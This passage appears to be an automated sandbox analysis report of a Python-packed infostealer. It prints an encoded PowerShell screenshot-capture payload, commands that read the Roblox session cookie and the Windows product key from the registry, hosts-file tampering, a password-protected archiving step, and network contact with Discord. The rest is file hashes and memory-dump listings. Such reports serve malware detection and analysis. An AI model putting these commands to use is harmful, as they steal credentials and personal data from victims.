QAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES734B.tmp" "c:\Users\Admin\AppData\Local\Temp\emviyuxo\CSC17AF24C7DE1D4780AB82FE22EAB521D.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
DE 142.250.186.99:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.130.233:443 discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI40922\python311.dll

MD5 76eb1ad615ba6600ce747bf1acde6679
SHA1 d3e1318077217372653be3947635b93df68156a4
SHA256 30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA512 2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

C:\Users\Admin\AppData\Local\Temp\_MEI40922\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3164-25-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI40922\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI40922\blank.aes

MD5 aa8030686d448b5a88f72b770c0f8c3a
SHA1 498f03e1dd788ff33cdd570eb00a85ee0e035bcd
SHA256 6a7c9ca577a6df02833911bea20dcec90e40f3dafaab330eff316cbfb4e24e8b
SHA512 f8eaf48d3919e85fd1eda64dc453c1fb1ea719a68e6b128ba19fe6ad74f123c7de8379a39d31cf67e25a45023716cd7e171933e0be1cd2a3a8d60f496f3e77af

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

memory/3164-47-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp

memory/3164-48-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ssl.pyd

MD5 936919f3509b2a913bf9e05723bc7cd2
SHA1 6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd
SHA256 efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3
SHA512 2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_sqlite3.pyd

MD5 c9d6ffa3798bb5ae9f1b082d66901350
SHA1 25724fecf4369447e77283ece810def499318086
SHA256 410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec
SHA512 878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_socket.pyd

MD5 3ea95c5c76ea27ca44b7a55f6cfdcf53
SHA1 aace156795cfb6f418b6a68a254bb4adfc2afc56
SHA256 7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923
SHA512 916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_queue.pyd

MD5 8b3ba5fb207d27eb3632486b936396a3
SHA1 5ad45b469041d88ec7fd277d84b1e2093ec7f93e
SHA256 9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051
SHA512 18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_lzma.pyd

MD5 5eee7d45b8d89c291965a153d86592ee
SHA1 93562dcdb10bd93433c7275d991681b299f45660
SHA256 7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9
SHA512 0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_hashlib.pyd

MD5 6d2132108825afd85763fc3b8f612b11
SHA1 af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0
SHA256 aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52
SHA512 196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_decimal.pyd

MD5 918e513c376a52a1046c4d4aee87042d
SHA1 d54edc813f56c17700252f487ef978bde1e7f7e1
SHA256 f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29
SHA512 ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_bz2.pyd

MD5 341a6188f375c6702de4f9d0e1de8c08
SHA1 204a508ca6a13eb030ed7953595e9b79b9b9ba3b
SHA256 7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e
SHA512 5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

C:\Users\Admin\AppData\Local\Temp\_MEI40922\unicodedata.pyd

MD5 6279c26d085d1b2efd53e9c3e74d0285
SHA1 bd0d274fb9502406b6b9a5756760b78919fa2518
SHA256 411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6
SHA512 30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

C:\Users\Admin\AppData\Local\Temp\_MEI40922\sqlite3.dll

MD5 cc9d1869f9305b5a695fc5e76bd57b72
SHA1 c6a28791035e7e10cfae0ab51e9a5a8328ea55c1
SHA256 31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee
SHA512 e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

C:\Users\Admin\AppData\Local\Temp\_MEI40922\select.pyd

MD5 2398a631bae547d1d33e91335e6d210b
SHA1 f1f10f901da76323d68a4c9b57f5edfd3baf30f5
SHA256 487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435
SHA512 6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ctypes.pyd

MD5 ee2d4cd284d6bad4f207195bf5de727f
SHA1 781344a403bbffa0afb080942cd9459d9b05a348
SHA256 2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009
SHA512 a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

memory/3164-54-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp

memory/3164-57-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp

memory/3164-59-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp

memory/3164-62-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp

memory/3164-70-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp

memory/3164-69-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp

memory/3164-71-0x00007FFE04410000-0x00007FFE04932000-memory.dmp

memory/3164-80-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp

memory/3164-78-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp

memory/3164-81-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp

memory/3164-79-0x00007FFE16170000-0x00007FFE16184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5p3ljf4.o30.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4148-90-0x0000020B41570000-0x0000020B41592000-memory.dmp

memory/4772-99-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-72-0x000001B5325D0000-0x000001B532AF2000-memory.dmp

memory/4772-101-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4148-110-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-64-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp

memory/4616-111-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-60-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp

memory/4148-112-0x0000020B41400000-0x0000020B41410000-memory.dmp

memory/4616-115-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/3164-116-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp

memory/4772-114-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4616-113-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/3164-118-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp

memory/1416-120-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/1416-121-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/3164-122-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp

memory/4616-119-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4772-117-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/1416-123-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4148-124-0x0000020B41400000-0x0000020B41410000-memory.dmp

memory/3164-125-0x000001B5325D0000-0x000001B532AF2000-memory.dmp

memory/2704-134-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-135-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp

memory/3164-136-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp

memory/3164-145-0x00007FFE04410000-0x00007FFE04932000-memory.dmp

memory/4616-147-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4772-146-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4772-148-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-150-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/1416-149-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/4148-151-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4616-152-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-155-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4616-156-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4616-154-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.cmdline

MD5 ef5af4133522b458cf7f31957fc2098c
SHA1 c75f88e0328f78400e8dacd88a4a9775a17301d0
SHA256 d14c19f416ce97a215fec10158853dfac6432c242351a5adf7384fcf9a242653
SHA512 98ccdb834caec76cc1b8943fd8e2814f44b332b487b02c4c81ac96c8c3c76594163032485e291c1faeb0e9061f287346da69663fa4b77e7b58c79cbc5a8a9fdf

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

memory/2704-175-0x000001A86B7A0000-0x000001A86B7A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.dll

MD5 3ce93bae2b317f02fea9067474f322b2
SHA1 2c9db780d8093bb75b577a0d4d0d360353579058
SHA256 b461f6baa5f9c06c284fa80e1be75130a07efe8f0d6e530abe81da6fb38e39be
SHA512 041bac05ac17e63b12b2951174982abf6b77b8ec64cd8cfeff77487ad77fc630efc0c96efc8aa9959960e660a3e0dd73c3bb94c011e65ea011903d9f14d8d0ec

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 74e4a39ae145a98de20041613220dfed
SHA1 ac5dd2331ae591d7d361e8947e1a8fba2c6bea12
SHA256 2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36
SHA512 96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 408641808e457ab6e23d62e59b767753
SHA1 4205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA256 3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512 e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

memory/4616-196-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

memory/2704-193-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-192-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fe4cd5675481c6c8c97e2f2e9c76c96
SHA1 b97159260e37b3fa7e89852d825d8cf0583258ee
SHA256 70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51
SHA512 8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac

memory/4264-241-0x00000224C1180000-0x00000224C1190000-memory.dmp

memory/4264-240-0x00000224C1180000-0x00000224C1190000-memory.dmp

memory/4264-239-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4148-189-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES734B.tmp

MD5 95b8bb6fb4c55f85ad69465f400ef02c
SHA1 22e72292845dbaaf9531929e848fbaf7e4ba54fa
SHA256 ea30690e49091432dcdf9b4dcc698856128e543bddf2724532bd05a46e36e90d
SHA512 cf1112096fbb0801b0d870635e2c747afe3104fa1adb59861439c9e281c34feec85d28adc6bf1e26085fef10710207c9413fc494d1145e412b818b7c3368c224

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\CSC17AF24C7DE1D4780AB82FE22EAB521D.TMP

MD5 0a7051f544c3ffde73c1ed0ab357be32
SHA1 caff3f010332347dc9bf93b97353e62528fddf56
SHA256 ee18153b8da31f8b11aefbcd520bb14351f5144f361914405d88bcfea6e7032a
SHA512 b1996462c89001a41eeb60fde70f7650f8ca6ee3bdad285c0400bf75238454ff534c5d0d9cd3d7be5b7b4808d961f9e0a187f32e79b20e3a0660e58627822475

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a873c13ffa169a1e672aa991ca72aeb3
SHA1 0e1e8e91738e70980ca646b91de79bb2dd0c7763
SHA256 bec3e737e684740ff59eb220c95d1cad5ba00ec305066bdb86665edbf0bdb2f5
SHA512 49d0cbedd336ae1438b43b0717b46df2af25936b5ac4a95abda02c47f7391301fe0c4d365e0e313434124d31924909db79ccad00b528210bdcc89ee96c6d9b3f

memory/864-252-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4264-243-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/864-255-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/1416-167-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0985ae117be8f70f56eb1635dda6971b
SHA1 a2030a3a416bae7ee3bb3be008655d0888572bfb
SHA256 bf51791875c3197972053173cad6bb2f836e1e786f338149836c5b58f413f934
SHA512 83afc1f898c90d4277c7115fa10b5316d4998180e723d2c8e8308edd79ee0e1b9b3142a4570f603b176d8392711d248da83baeffd583d7ada6f67f8c082a192b

C:\Users\Admin\AppData\Local\Temp\23Yox.zip

MD5 e4884a81fcec8733659071ac829db9ec
SHA1 3813e969372d7a40480ace6037d1109b90dda300
SHA256 011f127c82451470f373f7902088d1a27308d0cb3578033cc4bfd927262b755c
SHA512 ce5ba0792b6063abbb86feda819ee94653b7d7c18533fa6cf50ef495a5f80e48b9b4361a46f57cea30dbb4c71d4ff01bf419d81e6ae9ed1db363ed4f799fbaae

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\Task List.txt

MD5 7a839443fe72160e7b5b2b9ec4b5f8c4
SHA1 e41c194a07d1fa43853ad002a98ca0a0c9afdc56
SHA256 44b7a322ff3d5b52e842395b9e3f8c2ad73166d00361e67c2a3b81f134b7b623
